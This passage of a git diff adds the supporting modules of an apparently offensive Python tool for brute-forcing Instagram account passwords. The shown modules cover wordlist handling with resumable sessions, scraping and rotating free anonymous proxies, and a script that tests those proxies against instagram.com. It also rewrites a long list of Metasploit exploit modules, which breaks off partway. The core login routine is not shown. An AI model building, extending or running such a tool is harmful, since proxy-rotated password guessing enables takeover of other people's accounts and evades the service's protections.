{}\n[+] Password: {}'.format( + self.username.title(), password + )) + + sleep(self.delay) + + def stats_not_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Not Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Password Not Found') + + sleep(self.delay) + + def shutdown(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Shutting Down ...{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Shutting Down ...') + + sleep(self.delay) + + def info(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}i{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, msg, Fore.RESET + )) + else: + print('[i] {}'.format(msg)) + + sleep(2.5) + + def warning(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}!{0}] {1}{2}{3}'.format( + Fore.YELLOW, Fore.RED, msg, Fore.RESET + )) + else: + print('[!] {}'.format(msg)) + + sleep(self.delay) + + def prompt(self, data): + self.clear() + + if self.__is_color: + return input('{0}[{1}?{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, data, Fore.RESET + )) + else: + return input('[?] {}'.format(data)) diff --git a/tools/Instagram/lib/password_manager.py b/tools/Instagram/lib/password_manager.py new file mode 100644 index 0000000..d10c83e --- /dev/null +++ b/tools/Instagram/lib/password_manager.py @@ -0,0 +1,108 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Password manager + +from time import sleep +from hashlib import sha256 +from sys import version_info +from lib.display import Display +from lib.session import Session + + +class PasswordManager(object): + + def __init__(self, username, passlist_path, max_passwords, display): + self.passlist = [] + self.session = None + self.resume = False + self.is_alive = True + self.is_read = False + self.display = display + self.fingerprint = None + self.username = username + self.passwords_removed = 0 + self.passlist_path = passlist_path + self.max_passwords = max_passwords + Display.total_lines = self.count_lines() + + @property + def list_size(self): + return len(self.passlist) + + def list_add(self, password): + if not password in self.passlist: + self.passlist.append(password) + + def list_remove(self, password): + if password in self.passlist: + self.attempts += 1 + self.passlist.pop(self.passlist.index(password)) + self.session.write(self.attempts, self.passlist) + + def count_lines(self): + lines = 0 + + fingerprint = sha256( + self.username.lower().strip().encode() + ).hexdigest().encode() + + self.display.info('Reading wordlist ...') + + with open(self.passlist_path, 'rb') as f: + + for data in f: + lines += 1 + chunk = sha256(data).hexdigest().encode() + fingerprint = sha256(fingerprint + chunk).hexdigest().encode() + + self.fingerprint = fingerprint + self.session = Session(self.fingerprint) + + return lines + 1 + + def read(self): + attempts = 0 + with open(self.passlist_path, 'rt', encoding='utf-8') as passlist: + + for password in passlist: + if not self.is_alive: + break + + if self.resume: + self.attempts, self.passlist = self.session.read() + + if attempts < (self.attempts + self.list_size): + attempts += 1 + continue + else: + self.resume = False + + password = password.replace('\n', '').replace( + '\r', '').replace('\t', '') + + if self.list_size < self.max_passwords: + self.list_add(password) + else: + while self.list_size >= self.max_passwords and self.is_alive: + sleep(0.5) + + if self.is_alive: + self.list_add(password) + self.session.write(self.attempts, self.passlist) + + if self.is_alive: + self.is_read = True + + @property + def attempts(self): + return self.passwords_removed + + @attempts.setter + def attempts(self, n): + self.passwords_removed = n + + def start(self): + self.read() + + def stop(self): + self.is_alive = False diff --git a/tools/Instagram/lib/proxy.py b/tools/Instagram/lib/proxy.py new file mode 100644 index 0000000..02281d5 --- /dev/null +++ b/tools/Instagram/lib/proxy.py @@ -0,0 +1,26 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy + + +class Proxy(object): + + def __init__(self, proxy): + self.proxy = proxy + + @property + def ip(self): + return self.proxy['ip'] + + @property + def port(self): + return self.proxy['port'] + + @property + def country(self): + return self.proxy['country'] + + @property + def addr(self): + addr = '{}:{}'.format(self.proxy['ip'], self.proxy['port']) + return {'http': addr, 'https': addr} diff --git a/tools/Instagram/lib/proxy_list.py b/tools/Instagram/lib/proxy_list.py new file mode 100644 index 0000000..3cbe104 --- /dev/null +++ b/tools/Instagram/lib/proxy_list.py @@ -0,0 +1,18 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: A list that will manage proxies + + +class ProxyList(object): + + def __init__(self): + self.list = [] + + def __contains__(self, proxy): + for _proxy in self.list: + if _proxy.ip == proxy['ip'] and _proxy.port == proxy['port']: + return True + return False + + def append(self, proxy): + self.list.append(proxy) \ No newline at end of file diff --git a/tools/Instagram/lib/proxy_manager.py b/tools/Instagram/lib/proxy_manager.py new file mode 100644 index 0000000..6bf3ee4 --- /dev/null +++ b/tools/Instagram/lib/proxy_manager.py @@ -0,0 +1,42 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy manager + +from time import sleep +from queue import Queue +from .scraper import Scraper +from .bad_proxies import BadProxies + + +class ProxyManager(object): + + def __init__(self): + self.is_alive = True + self.proxies = Queue() + self.scraper = Scraper() + self.bad_proxies = BadProxies() + + def collect(self): + while self.is_alive: + if not self.proxies.qsize(): + + for proxy in self.scraper.proxies: + if not proxy in self.bad_proxies: + self.proxies.put(proxy) + + sleep(5) + + def bad_proxy(self, proxy): + if not proxy in self.bad_proxies: + self.bad_proxies.append(proxy) + + def get_proxy(self): + if self.proxies.qsize(): + return self.proxies.get() + + def start(self): + self.collect() + + def stop(self): + self.is_alive = False + self.scraper.is_alive = False \ No newline at end of file diff --git a/tools/Instagram/lib/scraper.py b/tools/Instagram/lib/scraper.py new file mode 100644 index 0000000..529d249 --- /dev/null +++ b/tools/Instagram/lib/scraper.py @@ -0,0 +1,123 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy scraper + +from time import sleep +from requests import get +from .proxy import Proxy +from random import randint +from .display import Display +from .proxy_list import ProxyList +from bs4 import BeautifulSoup as bs +from threading import Thread, RLock +from .const import fetch_time, debug + + +class Scraper(object): + + def __init__(self): + self.lock = RLock() + self.is_alive = True + self.display = Display() + self.scraped_proxies = [] + self.extra_proxies_link = 'http://spys.me/proxy.txt' + + self.links = [ + 'https://sslproxies.org', + 'https://free-proxy-list.net', + 'https://free-proxy-list.net/anonymous-proxy.html' + ] + + def parse_extra_proxy(self, proxy): + proxy = proxy.split(' ') + addr = proxy[0].split(':') + + return { + 'ip': addr[0], + 'port': addr[1], + 'country': proxy[1].split('-')[0] + } + + def parse_proxy(self, proxy): + proxy = proxy.find_all('td') + if proxy[4].string != 'transparent' and proxy[5].string != 'transparent': + return { + 'ip': proxy[0].string, + 'port': proxy[1].string, + 'country': proxy[3].string + } + + def scrape_proxies(self, link): + proxies = [] + + try: + proxies = bs(get(link, timeout=fetch_time).text, + 'html.parser').find('tbody').find_all('tr') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(link)) + + for proxy in proxies: + with self.lock: + _proxy = self.parse_proxy(proxy) + if _proxy: + self.scraped_proxies.append(_proxy) + + def scrape_extra_proxies(self): + proxies = [] + + try: + if self.is_alive: + proxies = get(self.extra_proxies_link, + timeout=fetch_time).text.split('\n') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(self.extra_proxies_link)) + + for proxy in proxies: + if '-H' in proxy and '-S' in proxy: + with self.lock: + self.scraped_proxies.append(self.parse_extra_proxy(proxy)) + + @property + def proxies(self): + proxy_list = ProxyList() + + threads = [] + threads = [Thread(target=self.scrape_proxies, args=[link]) + for link in self.links] + threads.append(Thread(target=self.scrape_extra_proxies)) + + index = 0 + while index < len(threads) and self.is_alive: + thread = threads[index] + + try: + thread.daemon = True + thread.start() + index += 1 + except: + sleep(0.5) + + while self.is_alive and len(threads): + for thread in [thread for thread in threads if not thread.is_alive()]: + threads.pop(threads.index(thread)) + sleep(0.5) + + if self.is_alive: + for proxy in self.scraped_proxies: + + if not proxy in proxy_list: + proxy_list.append(Proxy(proxy)) + + return [proxy_list.list.pop(randint(0, len(proxy_list.list)-1)) for _ in range(len(proxy_list.list))] diff --git a/tools/Instagram/lib/session.py b/tools/Instagram/lib/session.py new file mode 100644 index 0000000..91fd976 --- /dev/null +++ b/tools/Instagram/lib/session.py @@ -0,0 +1,106 @@ +# Date: 05/05/2018 +# Author: Mohamed +# Description: Session Handler + +import json +import sqlite3 +from os import remove +from sys import version_info +from lib.const import db_path +from os.path import exists as path +from csv import DictWriter, DictReader + + +class DatabaseWrapper: + + def __init__(self, db_name): + self.db_name = db_name + + def db_query(self, cmd, args=[], fetchone=True): + database = sqlite3.connect(self.db_name) + sql = database.cursor().execute(cmd, args) + data = sql.fetchone()[0] if fetchone else sql.fetchall() + database.close() + return data + + def db_execute(self, cmd, args=[]): + database = sqlite3.connect(self.db_name) + database.cursor().execute(cmd, args) + database.commit() + database.close() + + +class Session(DatabaseWrapper): + + is_busy = False + + def __init__(self, fingerprint): + super().__init__(db_path) + self.fingerprint = fingerprint + self.create_tables() + + def create_tables(self): + self.db_execute(''' + CREATE TABLE IF NOT EXISTS + Session( + session_id TEXT, + attempts INTEGER, + list TEXT, + + PRIMARY KEY(session_id) + ); + ''') + + @property + def exists(self): + return self.db_query('SELECT COUNT(*) FROM Session WHERE session_id=?;', [self.fingerprint]) + + def read(self): + + if not self.exists: + return 0, [] + + attempts, list = self.db_query(''' + SELECT attempts, list + FROM Session + WHERE session_id=? + ''', args=[self.fingerprint], fetchone=False)[0] + + return attempts, json.loads(list) + + def _write(self, attempts, _list): + + if not self.exists: + self.db_execute(''' + INSERT INTO Session(session_id, attempts, list) + VALUES(?, ?, ?); + ''', args=[self.fingerprint, attempts, json.dumps(_list)]) + return + + self.db_execute(''' + UPDATE Session + SET attempts=?, list=? + WHERE session_id=?; + ''', args=[attempts, json.dumps(_list), self.fingerprint]) + + def write(self, attempts, _list): + if not attempts: + return + + while Session.is_busy: + pass + + try: + Session.is_busy = True + self._write(attempts, _list) + except: + pass + finally: + Session.is_busy = False + + def delete(self): + if self.exists: + self.db_execute(''' + DELETE FROM Session + WHERE session_id=?; + ''', args=[self.fingerprint]) diff --git a/tools/Instagram/requirements.txt b/tools/Instagram/requirements.txt new file mode 100644 index 0000000..d86bc64 --- /dev/null +++ b/tools/Instagram/requirements.txt @@ -0,0 +1,4 @@ +bs4 +future +requests +colorama diff --git a/tools/Instagram/test_proxies.py b/tools/Instagram/test_proxies.py new file mode 100644 index 0000000..bc95120 --- /dev/null +++ b/tools/Instagram/test_proxies.py @@ -0,0 +1,138 @@ +''' +Date: 3/15/2019 +Author: Mohamed +Description: Reads a file that contains a list of proxies and determines whether or not that list is good. + Each line in the file must be in the format of ip:port +''' + +import platform +from os import system +from time import sleep +from requests import Session +from threading import Thread, RLock + +proxy_list = 'proxies.txt' +target_site = 'https://instagram.com' + + +def get_proxies(): + proxies = [] + + with open(proxy_list, 'rt', encoding='utf-8') as proxies_file: + + for line in proxies_file: + if not line: + continue + + ip, port = line.replace('\r', '').split(':') + + port = int(port) + proxy = {'ip': ip, 'port': port} + proxies.append(proxy) + + return proxies + + +class TestProxies: + + def __init__(self, proxies): + self.worked = 0 + self.failed = 0 + self.lock = RLock() + self.active_brs = 0 + self.is_alive = True + self.proxies = proxies + self.total = len(proxies) + self.test_link = target_site + + def display(self): + system('cls' if platform.system() == 'Windows' else 'clear') + worked, failed, total = self.worked, self.failed, self.total + + worked_per = round((worked/total) * 100, 2) + failed_per = round((failed/total) * 100, 2) + complete = round(worked_per + failed_per, 2) + + print(f'Complete: {complete}%') + print(f'Active browsers: {self.active_brs}') + print(f'Proxies worked: {worked_per}% [{worked}]') + print(f'Proxies failed: {failed_per}% [{failed}]') + + def test_proxy(self, proxy): + br = Session() + + addr = '{}:{}'.format(proxy['ip'], proxy['port']) + addr = {'http': addr, 'https': addr} + br.proxies.update(addr) + + try: + br.get(self.test_link, timeout=(10, 15)) + + with self.lock: + self.worked += 1 + except: + with self.lock: + self.failed += 1 + finally: + br.close() + + if self.is_alive: + with self.lock: + self.display() + + self.active_brs -= 1 + + def start(self): + for proxy in self.proxies: + + while self.is_alive and self.active_brs >= 512: + pass + + if not self.is_alive: + break + + with self.lock: + self.active_brs += 1 + + Thread(target=self.test_proxy, args=[proxy], daemon=True).start() + + while self.is_alive and self.active_brs: + sleep(0.5) + + self.display() + + def stop(self): + self.is_alive = False + + while self.active_brs: + try: + with self.lock: + self.display() + + sleep(0.5) + except KeyboardInterrupt: + break + + def examine(self): + failed = self.failed / self.total + worked = self.worked / self.total + + if worked == 0: + print('Bad proxy list') + elif (failed - worked) >= 0.1: + print('Bad proxy list') + elif (failed - worked) == 0: + print('Bad proxy list') + else: + print('Good proxy list') + + +if __name__ == '__main__': + test_proxies = TestProxies(get_proxies()) + + try: + test_proxies.start() + except KeyboardInterrupt: + test_proxies.stop() + finally: + test_proxies.examine() diff --git a/tools/exploits.txt b/tools/exploits.txt index 2b18721..f97b623 100644 --- a/tools/exploits.txt +++ b/tools/exploits.txt @@ -1,1858 +1,1896 @@ Exploits ======== - Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- - aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation - aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow - aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) - android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution - android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE - android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow - android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution - android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit - android/local/futex_requeue 2014-05-03 excellent No Android 'Towelroot' Futex Requeue Kernel Exploit - android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit - apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow - apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF - apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS MobileMail LibTIFF Buffer Overflow - apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability - bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow - bsdi/softcart/mercantec_softcart 2004-08-19 great No Mercantec SoftCart CGI Overflow - dialup/multi/login/manyargs 2001-12-12 good No System V Derived /bin/login Extraneous Arguments Buffer Overflow - firefox/local/exec_shellcode 2014-03-10 excellent No Firefox Exec Shellcode from Privileged Javascript Shell - freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) - freebsd/http/watchguard_cmd_exec 2015-06-29 excellent Yes Watchguard XCS Remote Command Execution - freebsd/local/mmap 2013-06-18 great Yes FreeBSD 9 Address Space Manipulation Privilege Escalation - freebsd/local/watchguard_fix_corrupt_mail 2015-06-29 manual Yes Watchguard XCS FixCorruptMail Local Privilege Escalation - freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution - freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) - freebsd/tacacs/xtacacsd_report 2008-01-08 average No XTACACSD report() Buffer Overflow - freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow - hpux/lpd/cleanup_exec 2002-08-28 excellent No HP-UX LPD Command Execution - irix/lpd/tagprinter_exec 2001-09-01 excellent Yes Irix LPD tagprinter Command Execution - linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection - linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good No Adobe Flash Player ActionScript Launch Command Execution Vulnerability - linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) - linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) - linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) - linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution - linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) - linux/http/airties_login_cgi_bof 2015-03-31 normal Yes Airties login-cgi Buffer Overflow - linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution - linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution - linux/http/alienvault_sqli_exec 2014-04-24 excellent Yes AlienVault OSSIM SQL Injection and Remote Code Execution - linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution - linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution - linux/http/astium_sqli_upload 2013-09-17 manual Yes Astium Remote Code Execution - linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution - linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution - linux/http/axis_srv_parhand_rce 2018-06-18 excellent Yes Axis Network Camera .srv to parhand RCE - linux/http/belkin_login_bof 2014-05-09 normal Yes Belkin Play N750 login.cgi Buffer Overflow - linux/http/centreon_sqli_exec 2014-10-15 excellent Yes Centreon SQL and Command Injection - linux/http/centreon_useralias_exec 2016-02-26 excellent Yes Centreon Web Useralias Command Execution - linux/http/cfme_manageiq_evm_upload_exec 2013-09-04 excellent Yes Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal - linux/http/cisco_firepower_useradd 2016-10-10 excellent Yes Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability - linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution - linux/http/crypttech_cryptolog_login_exec 2017-05-03 excellent Yes Crypttech CryptoLog Remote Code Execution - linux/http/dcos_marathon 2017-03-03 excellent Yes DC/OS Marathon UI Docker Exploit - linux/http/ddwrt_cgibin_exec 2009-07-20 excellent No DD-WRT HTTP Daemon Arbitrary Command Execution - linux/http/denyall_waf_exec 2017-09-19 excellent Yes DenyAll Web Application Firewall Remote Code Execution - linux/http/dlink_authentication_cgi_bof 2013-02-08 normal Yes D-Link authentication.cgi Buffer Overflow - linux/http/dlink_command_php_exec_noauth 2013-02-04 excellent No D-Link Devices Unauthenticated Remote Command Execution - linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload - linux/http/dlink_dcs_930l_authenticated_remote_command_execution 2015-12-20 excellent No D-Link DCS-930L Authenticated Remote Command Execution - linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution - linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution - linux/http/dlink_dir605l_captcha_bof 2012-10-08 manual Yes D-Link DIR-605L Captcha Handling Buffer Overflow - linux/http/dlink_dir615_up_exec 2013-02-07 excellent No D-Link DIR615h OS Command Injection - linux/http/dlink_dir850l_unauth_exec 2017-08-09 excellent Yes DIR-850L (Un)authenticated OS Command Exec - linux/http/dlink_dsl2750b_exec_noauth 2016-02-05 great Yes D-Link DSL-2750B OS Command Injection - linux/http/dlink_dspw110_cookie_noauth_exec 2015-06-12 normal Yes D-Link Cookie Command Execution - linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow - linux/http/dlink_hedwig_cgi_bof 2013-02-08 normal Yes D-Link hedwig.cgi Buffer Overflow in Cookie Header - linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow - linux/http/dlink_hnap_header_exec_noauth 2015-02-13 normal Yes D-Link Devices HNAP SOAPAction-Header Command Execution - linux/http/dlink_hnap_login_bof 2016-11-07 excellent Yes Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow - linux/http/dlink_upnp_exec_noauth 2013-07-05 normal Yes D-Link Devices UPnP SOAP Command Execution - linux/http/dnalims_admin_exec 2017-03-08 excellent Yes dnaLIMS Admin Module Command Execution - linux/http/docker_daemon_tcp 2017-07-25 excellent Yes Docker Daemon - Unprotected TCP Socket Exploit - linux/http/dolibarr_cmd_exec 2012-04-06 excellent Yes Dolibarr ERP/CRM Post-Auth OS Command Injection - linux/http/dreambox_openpli_shell 2013-02-08 great No OpenPLI Webif Arbitrary Command Execution - linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection - linux/http/empire_skywalker 2016-10-15 excellent Yes PowerShellEmpire Arbitrary File Upload (Skywalker) - linux/http/esva_exec 2012-08-16 excellent Yes E-Mail Security Virtual Appliance learn-msg.cgi Command Injection - linux/http/f5_icall_cmd 2015-09-03 excellent Yes F5 iControl iCall::Script Root Command Execution - linux/http/f5_icontrol_exec 2013-09-17 excellent Yes F5 iControl Remote Root Command Execution - linux/http/foreman_openstack_satellite_code_exec 2013-06-06 excellent No Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection - linux/http/fritzbox_echo_exec 2014-02-11 excellent Yes Fritz!Box Webcm Unauthenticated Command Injection - linux/http/github_enterprise_secret 2017-03-15 excellent Yes Github Enterprise Default Session Secret And Deserialization Vulnerability - linux/http/gitlist_exec 2014-06-30 excellent Yes Gitlist Unauthenticated Remote Command Execution - linux/http/goahead_ldpreload 2017-12-18 excellent Yes GoAhead Web Server LD_PRELOAD Arbitrary Module Load - linux/http/goautodial_3_rce_command_injection 2015-04-21 excellent Yes GoAutoDial 3.3 Authentication Bypass / Command Injection - linux/http/gpsd_format_string 2005-05-25 average No Berlios GPSD Format String Vulnerability - linux/http/groundwork_monarch_cmd_exec 2013-03-08 excellent Yes GroundWork monarch_scan.cgi OS Command Injection - linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution - linux/http/hp_system_management 2012-09-01 normal Yes HP System Management Anonymous Access Code Execution - linux/http/hp_van_sdn_cmd_inject 2018-06-25 excellent Yes HP VAN SDN Controller Root Command Injection - linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection - linux/http/ibm_qradar_unauth_rce 2018-05-28 excellent Yes IBM QRadar SIEM Unauthenticated Remote Code Execution - linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) - linux/http/ipfire_oinkcode_exec 2017-06-09 excellent Yes IPFire proxy.cgi RCE - linux/http/ipfire_proxy_exec 2016-05-04 excellent Yes IPFire proxy.cgi RCE - linux/http/kaltura_unserialize_cookie_rce 2017-09-12 excellent Yes Kaltura Remote PHP Code Execution over Cookie - linux/http/kaltura_unserialize_rce 2016-03-15 excellent Yes Kaltura Remote PHP Code Execution - linux/http/kloxo_sqli 2014-01-28 manual Yes Kloxo SQL Injection and Remote Code Execution - linux/http/lifesize_uvc_ping_rce 2014-03-21 excellent No LifeSize UVC Authenticated RCE via Ping - linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow - linux/http/linksys_e1500_apply_exec 2013-02-05 excellent No Linksys E1500/E2500 apply.cgi Remote Command Injection - linux/http/linksys_themoon_exec 2014-02-13 excellent Yes Linksys E-Series TheMoon Remote Command Injection - linux/http/linksys_wrt110_cmd_exec 2013-07-12 excellent Yes Linksys Devices pingstr Remote Command Injection - linux/http/linksys_wrt160nv2_apply_exec 2013-02-11 excellent No Linksys WRT160nv2 apply.cgi Remote Command Injection - linux/http/linksys_wrt54gl_apply_exec 2013-01-18 manual No Linksys WRT54GL apply.cgi Command Execution - linux/http/linksys_wvbr0_user_agent_exec_noauth 2017-12-13 excellent Yes Linksys WVBR0-25 User-Agent Command Execution - linux/http/logsign_exec 2017-02-26 excellent Yes Logsign Remote Command Injection - linux/http/mailcleaner_exec 2018-12-19 excellent No Mailcleaner Remote Code Execution - linux/http/microfocus_secure_messaging_gateway 2018-06-19 excellent Yes MicroFocus Secure Messaging Gateway Remote Code Execution - linux/http/multi_ncc_ping_exec 2015-02-26 normal Yes D-Link/TRENDnet NCC Service Command Injection - linux/http/mutiny_frontend_upload 2013-05-15 excellent Yes Mutiny 5 Arbitrary File Upload - linux/http/mvpower_dvr_shell_exec 2015-08-23 excellent Yes MVPower DVR Shell Unauthenticated Command Execution - linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution - linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution - linux/http/netgear_dgn1000_setup_unauth_exec 2013-06-05 excellent Yes Netgear DGN1000 Setup.cgi Unauthenticated RCE - linux/http/netgear_dgn1000b_setup_exec 2013-02-06 excellent No Netgear DGN1000B setup.cgi Remote Command Execution - linux/http/netgear_dgn2200b_pppoe_exec 2013-02-15 manual No Netgear DGN2200B pppoe.cgi Remote Command Execution - linux/http/netgear_dnslookup_cmd_exec 2017-02-25 excellent Yes Netgear DGN2200 dnslookup.cgi Command Injection - linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection - linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation - linux/http/netgear_unauth_exec 2016-02-25 excellent Yes Netgear Devices Unauthenticated Remote Command Execution - linux/http/netgear_wnr2000_rce 2016-12-20 excellent Yes NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow - linux/http/nginx_chunked_size 2013-05-07 great Yes Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow - linux/http/nuuo_nvrmini_auth_rce 2016-08-04 excellent No NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution - linux/http/nuuo_nvrmini_unauth_rce 2016-08-04 excellent Yes NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution - linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution - linux/http/openfiler_networkcard_exec 2012-09-04 excellent Yes Openfiler v2.x NetworkCard Command Execution - linux/http/pandora_fms_exec 2014-01-29 excellent Yes Pandora FMS Remote Code Execution - linux/http/pandora_fms_sqli 2014-02-01 excellent Yes Pandora FMS Default Credential / SQLi Remote Code Execution - linux/http/panos_readsessionvars 2017-12-11 excellent No Palo Alto Networks readSessionVarsFromFile() Session Corruption - linux/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow - linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution - linux/http/pineapp_ldapsyncnow_exec 2013-07-26 excellent Yes PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution - linux/http/pineapp_livelog_exec 2013-07-26 excellent Yes PineApp Mail-SeCure livelog.html Arbitrary Command Execution - linux/http/pineapp_test_li_conn_exec 2013-07-26 excellent Yes PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution - linux/http/pineapple_bypass_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection - linux/http/pineapple_preconfig_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection - linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution - linux/http/qnap_qcenter_change_passwd_exec 2018-07-11 excellent Yes QNAP Q'Center change_passwd Command Execution - linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution - linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include - linux/http/rancher_server 2017-07-27 excellent Yes Rancher Server - Docker Exploit - linux/http/realtek_miniigd_upnp_exec_noauth 2015-04-24 normal Yes Realtek SDK Miniigd UPnP SOAP Command Execution - linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Yes Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution - linux/http/samsung_srv_1670d_upload_exec 2017-03-14 good Yes Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload - linux/http/seagate_nas_php_exec_noauth 2015-03-01 normal Yes Seagate Business NAS Unauthenticated Remote Command Execution - linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow - linux/http/sophos_wpa_iface_exec 2014-04-08 excellent No Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution - linux/http/sophos_wpa_sblistpack_exec 2013-09-06 excellent Yes Sophos Web Protection Appliance sblistpack Arbitrary Command Execution - linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution - linux/http/supervisor_xmlrpc_exec 2017-07-19 excellent Yes Supervisor XML-RPC Authenticated 